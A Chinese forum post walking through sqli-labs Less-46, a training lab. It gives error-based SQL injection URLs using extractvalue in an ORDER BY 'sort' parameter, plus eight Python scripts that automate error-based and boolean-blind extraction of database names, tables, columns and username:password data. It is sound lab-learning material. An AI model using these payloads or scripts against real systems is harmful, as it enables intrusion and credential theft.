IT评测·应用市场-qidao123.com技术社区

标题: sqli-labs-master第46关 [打印本页]

---

作者: 河曲智叟    时间: 2025-2-25 06:27
标题: sqli-labs-master第46关
目录
报错注入
直接注入
数据库名
数据库中的表名
users表结构：
users表数据：
python脚本注入
直接注入
获取数据库名
获取表名
获取表结构
获取数据
布尔盲注
获取数据库名
获取表名
获取表结构
获取数据

---

报错注入

直接注入

数据库名

当前数据库名：
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select database() limit 1,1))))

系统数据库名：
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata))))

长度限制，利用截取函数substr()：
 http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),1,32))))

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),32,64))))

数据库中的表名

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'))))

同理利用截取函数substr()：
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'),32,64))))

users表结构：

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),1,32))))

users表数据：

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,32))))

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),32,64))))

python脚本注入

直接注入

获取数据库名

1. import requests
2. import re
4. target_url = "http://sqli-labs:8013/Less-46/"
6. def extract_database_names():
7.     database_names = []
8.     index = 0
10.     while True:
11.         payload = {
12.             "sort": f"(extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {index},1))))"
13.         }
15.         try:
16.             response = requests.get(target_url, params=payload, timeout=10)
17.             response.raise_for_status()
19.             match = re.search(r"XPATH syntax error: '~([^']+)", response.text)
21.             if match:
22.                 db_name = match.group(1)
23.                 database_names.append(db_name)
24.                 print(f"成功提取数据库名: {db_name}")
25.                 index += 1
26.             elif index == 0:
27.                 print("找到数据库名，可能漏洞不存在或错误信息被隐藏")
28.                 break
29.             else:
30.                 print("已提取所有数据库名")
31.                 break
33.         except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:
34.             print(f"[-] 请求错误，索引为 {index}: {e}")
36.     return database_names
38. if __name__ == "__main__":
39.     all_database_names = extract_database_names()

复制代码

获取表名

1. import requests
2. import re
4. target_url = "http://sqli-labs:8013/Less-46/"
6. def extract_table_names(database_name):
7.     table_names = []
8.     index = 0
10.     while True:
11.         payload = {
12.             "sort": f"(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1))))"
13.         }
15.         try:
16.             response = requests.get(target_url, params=payload, timeout=10)
17.             response.raise_for_status()
19.             match = re.search(r"XPATH syntax error: '~([^']+)", response.text)
21.             if match:
22.                 table_name = match.group(1)
23.                 table_names.append(table_name)
24.                 print(f"成功提取表名: {table_name}")
25.                 index += 1
26.             elif index == 0:
27.                 print("找到表名，可能漏洞不存在或错误信息被隐藏")
28.                 break
29.             else:
30.                 print("已提取所有表名")
31.                 break
33.         except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:
34.             print(f"[-] 请求错误，索引为 {index}: {e}")
36.     return table_names
38. if __name__ == "__main__":
39.     database_name = "security"  # 目标数据库名
40.     all_table_names = extract_table_names(database_name)

复制代码

获取表结构

1. import requests
2. import re
4. target_url = "http://sqli-labs:8013/Less-46/"
6. def extract_column_names(database_name, table_name):
7.     column_names = []
8.     index = 0
10.     while True:
11.         payload = {
12.             "sort": f"(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{database_name}' limit {index},1))))"
13.         }
15.         try:
16.             response = requests.get(target_url, params=payload, timeout=10)
17.             response.raise_for_status()
19.             match = re.search(r"XPATH syntax error: '~([^']+)", response.text)
21.             if match:
22.                 column_name = match.group(1)
23.                 column_names.append(column_name)
24.                 print(f"成功提取列名: {column_name}")
25.                 index += 1
26.             elif index == 0:
27.                 print("找到列名，可能漏洞不存在或错误信息被隐藏")
28.                 break
29.             else:
30.                 print("已提取所有列名")
31.                 break
33.         except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:
34.             print(f"[-] 请求错误，索引为 {index}: {e}")
36.     return column_names
38. if __name__ == "__main__":
39.     database_name = "security"  # 目标数据库名
40.     table_name = "users"       # 目标表名
41.     all_column_names = extract_column_names(database_name, table_name)

复制代码

获取数据

1. import requests
2. import re
4. target_url="http://sqli-labs:8013/Less-46/"
7. def extract_user_data(database_name, table_name, record_id):
8.     # 提取 username 和 password 的数据
9.     data={}
11.     # 获取 username
12.     payload_username={
13.         "sort": f"(extractvalue(1,concat(0x7e,(select username from {table_name} where id={record_id} limit 0,1))))"
14.     }
16.     # 获取 password
17.     payload_password={
18.         "sort": f"(extractvalue(1,concat(0x7e,(select password from {table_name} where id={record_id} limit 0,1))))"
19.     }
21.     try:
22.         response_username=requests.get(target_url, params=payload_username, timeout=10)
23.         response_username.raise_for_status()
24.         match_username=re.search(r"XPATH syntax error: '~([^']+)", response_username.text)
26.         response_password=requests.get(target_url, params=payload_password, timeout=10)
27.         response_password.raise_for_status()
28.         match_password=re.search(r"XPATH syntax error: '~([^']+)", response_password.text)
30.         if match_username and match_password:
31.             username=match_username.group(1)
32.             password=match_password.group(1)
33.             data={'username': username, 'password': password}
34.             print(f"{username}:{password}")
36.     except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:
37.         print(f"[-] 请求错误，id={record_id}: {e}")
39.     return data
42. if __name__ == "__main__":
43.     database_name="security"  # 目标数据库名
44.     table_name="users"  # 目标表名
45.     record_id=1  # 从 id=1 开始
47.     while True:
48.         print(f"正在提取 id={record_id} 的数据...")
49.         user_data=extract_user_data(database_name, table_name, record_id)
51.         if not user_data:  # 如果没有提取到数据，则跳出循环
52.             print("没有更多数据，提取结束。")
53.             break
55.         record_id+=1  # 继续下一个 id

复制代码

布尔盲注

获取数据库名

1. import requests
2. from bs4 import BeautifulSoup
4. # 获取页面中的用户名（用于判断SQL注入是否成功）
5. def get_username(resp):
6.     soup = BeautifulSoup(resp, 'html.parser')
7.     try:
8.         username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
9.     except IndexError:
10.         username = ""
11.     return username
13. # 向目标URL发送请求并返回响应
14. def send_request(url):
15.     try:
16.         resp = requests.get(url)
17.         return resp
18.     except requests.RequestException as e:
19.         print(f"Request error: {e}")
20.         return None
22. # 获取数据库名
23. def get_database_name():
24.     database_name = ''
25.     i = 1
26.     while True:
27.         left = 32
28.         right = 127
29.         mid = (left + right) // 2
30.         while left < right:
31.             url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
32.             resp = send_request(url)
33.             if resp and 'Dumb' == get_username(resp.text):
34.                 left = mid + 1
35.             else:
36.                 right = mid
37.             mid = (left + right) // 2
38.         if mid == 32:
39.             break
40.         database_name += chr(mid)
41.         i += 1
42.         print(f"Database Name: {database_name}")
44. if __name__ == '__main__':
45.     get_database_name()

复制代码

获取表名

1. import requests
2. from bs4 import BeautifulSoup
4. # 获取页面中的用户名（用于判断SQL注入是否成功）
5. def get_username(resp):
6.     soup = BeautifulSoup(resp, 'html.parser')
7.     try:
8.         username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
9.     except IndexError:
10.         username = ""
11.     return username
13. # 向目标URL发送请求并返回响应
14. def send_request(url):
15.     try:
16.         resp = requests.get(url)
17.         return resp
18.     except requests.RequestException as e:
19.         print(f"Request error: {e}")
20.         return None
22. # 获取表名
23. def get_table_names():
24.     tables = ''
25.     i = 1
26.     while True:
27.         left = 32
28.         right = 127
29.         mid = (left + right) // 2
30.         while left < right:
31.             url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(table_name) from \
32.                 information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
33.             resp = send_request(url)
34.             if resp and 'Dumb' == get_username(resp.text):
35.                 left = mid + 1
36.             else:
37.                 right = mid
38.             mid = (left + right) // 2
39.         if mid == 32:
40.             break
41.         tables += chr(mid)
42.         i += 1
43.         print(f"Tables: {tables}")
45. if __name__ == '__main__':
46.     get_table_names()

复制代码

获取表结构

1. import requests
2. from bs4 import BeautifulSoup
4. # 获取页面中的用户名（用于判断SQL注入是否成功）
5. def get_username(resp):
6.     soup = BeautifulSoup(resp, 'html.parser')
7.     try:
8.         username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
9.     except IndexError:
10.         username = ""
11.     return username
13. # 向目标URL发送请求并返回响应
14. def send_request(url):
15.     try:
16.         resp = requests.get(url)
17.         return resp
18.     except requests.RequestException as e:
19.         print(f"Request error: {e}")
20.         return None
22. # 获取列名
23. def get_column_names():
24.     columns = ''
25.     i = 1
26.     while True:
27.         left = 32
28.         right = 127
29.         mid = (left + right) // 2
30.         while left < right:
31.             url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(column_name) from \
32.                 information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "
33.             resp = send_request(url)
34.             if resp and 'Dumb' == get_username(resp.text):
35.                 left = mid + 1
36.             else:
37.                 right = mid
38.             mid = (left + right) // 2
39.         if mid == 32:
40.             break
41.         columns += chr(mid)
42.         i += 1
43.         print(f"Columns in 'users': {columns}")
45. if __name__ == '__main__':
46.     get_column_names()

复制代码

获取数据

1. import requests
2. from bs4 import BeautifulSoup
4. # 获取页面中的用户名（用于判断SQL注入是否成功）
5. def get_username(resp):
6.     soup = BeautifulSoup(resp, 'html.parser')
7.     try:
8.         username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
9.     except IndexError:
10.         username = ""
11.     return username
13. # 向目标URL发送请求并返回响应
14. def send_request(url):
15.     try:
16.         resp = requests.get(url)
17.         return resp
18.     except requests.RequestException as e:
19.         print(f"Request error: {e}")
20.         return None
22. # 获取数据（如用户名:密码）
23. def get_user_data():
24.     user_data = ''
25.     i = 1
26.     while True:
27.         left = 32
28.         right = 127
29.         mid = (left + right) // 2
30.         while left < right:
31.             url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(username,':',password) \
32.                 from users),{i},1))>{mid},id,username) -- "
33.             resp = send_request(url)
34.             if resp and 'Dumb' == get_username(resp.text):
35.                 left = mid + 1
36.             else:
37.                 right = mid
38.             mid = (left + right) // 2
39.         if mid == 32:
40.             break
41.         user_data += chr(mid)
42.         i += 1
43.         print(f"User Data (username:password): {user_data}")
45. if __name__ == '__main__':
46.     get_user_data()

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/)

Powered by Discuz! X3.4